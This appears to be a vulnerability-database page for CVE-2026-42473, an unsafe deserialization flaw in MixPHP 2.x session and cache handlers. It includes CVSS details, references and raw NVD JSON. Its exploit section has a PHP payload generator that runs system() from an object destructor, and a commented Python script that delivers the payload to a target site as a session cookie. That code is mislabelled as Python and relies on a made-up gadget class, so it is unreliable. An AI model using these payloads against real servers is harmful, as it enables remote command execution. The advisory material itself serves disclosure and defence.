CVE-2026-42473

Description

Unsafe deserialization vulnerability in MixPHP Framework 2.x thru 2.2.17. The session and cache handlers use unserialize() on data from the filesystem in the FileHandler object.

CVSS Details

CVSS Score

9.8

Severity

CRITICAL

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

MixPHP Framework 2.x

MixPHP Framework 2.2.17

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

<?php
// PoC Generator for CVE-2026-42473
// This script generates a malicious serialized object to exploit unsafe deserialization.
// Usage: php generate_payload.php > payload.txt

class ExploitObject {
    public $cmd;

    function __construct($cmd) {
        $this->cmd = $cmd;
    }

    function __destruct() {
        // Vulnerable system call triggered during deserialization
        system($this->cmd);
    }
}

// Generate payload to execute 'id' command
// In a real attack, replace 'ExploitObject' with a valid Gadget Chain available in MixPHP
$payload = serialize(new ExploitObject('id'));

echo $payload;
?>

# Python script to deliver the payload (Conceptual)
# import requests
# target_url = "http://target-mixphp-site.com"
# payload_file = open('payload.txt', 'r').read().strip()
# 
# # Assuming the application stores session data in files and accepts custom session IDs
# cookies = {'PHPSESSIONID': payload_file}
# 
# response = requests.get(target_url, cookies=cookies)
# print("Payload sent, check response for execution results.")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-42473
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-42473
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-42473/
[4] VulDB https://vuldb.com/cve/CVE-2026-42473
[5] https://gist.github.com/sgInnora/fa46386840fe978a30d7e53c458f2975
[6] https://github.com/mix-php/mix
[7] https://github.com/mix-php/mix/blob/v2.2.17/src/sync-invoke/src/Server.php

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-42473", "sourceIdentifier": "[email protected]", "published": "2026-05-01T16:16:31.703", "lastModified": "2026-05-05T19:39:58.510", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Unsafe deserialization vulnerability in MixPHP Framework 2.x thru 2.2.17. The session and cache handlers use unserialize() on data from the filesystem in the FileHandler object."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-502"}]}], "references": [{"url": "https://gist.github.com/sgInnora/fa46386840fe978a30d7e53c458f2975", "source": "[email protected]"}, {"url": "https://github.com/mix-php/mix", "source": "[email protected]"}, {"url": "https://github.com/mix-php/mix/blob/v2.2.17/src/sync-invoke/src/Server.php", "source": "[email protected]"}]}}